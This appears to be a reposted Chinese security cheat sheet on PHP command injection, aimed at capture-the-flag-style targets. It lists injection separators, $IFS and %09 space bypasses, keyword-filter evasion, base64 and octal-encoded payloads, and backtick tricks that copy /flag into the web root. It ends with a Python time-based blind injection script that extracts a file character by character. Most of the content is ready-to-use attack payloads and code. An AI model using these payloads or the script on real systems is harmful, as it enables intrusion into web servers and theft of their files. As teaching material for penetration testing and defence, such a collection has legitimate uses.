命令执行

admin 2024年10月15日13:01:25评论12 views字数 819阅读2分43秒阅读模式

命令执行 #

以下介绍为 PHP 环境

用于命令执行的函数有

system
exec
passthru
shell_exec

1234

一些常见的绕过方法 #

命令拼接

命令执行

以及

%0a
%0d
\n

123

空格绕过

$IFS
${IFS}
$IFS$1
%09
{cat,flag.php}

12345

关键字 flag 被过滤

fla\g
a=g;fla$a

12

例如:

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

1

或者使用 base64 编码绕过

?url=127.0.0.1|`echo%09WTJGMElDOWxkR012TG1acGJtUm1iR0ZuTDJac1lXY3VkSGgw|base64%09-d|base64%09-d`

1

另外如反引号可在语句中执行命令

ls `cat /flag > /var/www/html/1.txt`

1

或者使用 $() 和八进制

$(printf$IFS$9"\154\163")

1

另附一份无回显盲注脚本

import requests
import time

s=requests.session()
flag=''
for z in range(1,50):
    for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_!@#%|^&{}[]/-()+=,\\':
        starTime=time.time()
        url="http://127.0.0.1/?cmd=if [ `cut -c"+str(z)+"-"+str(z)+" /flag` != '"+i+"' ]; then echo 1 ; else sleep 3; fi"
        r=s.get(url)
        if((time.time()-starTime)>3):
            flag+=i
            print(flag)
            break
    print(z)
print('the flag is'+flag)

12345678910111213141516 - source:wiki.wgpsec.org

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月15日13:01:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   命令执行https://cn-sec.com/archives/3270880.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息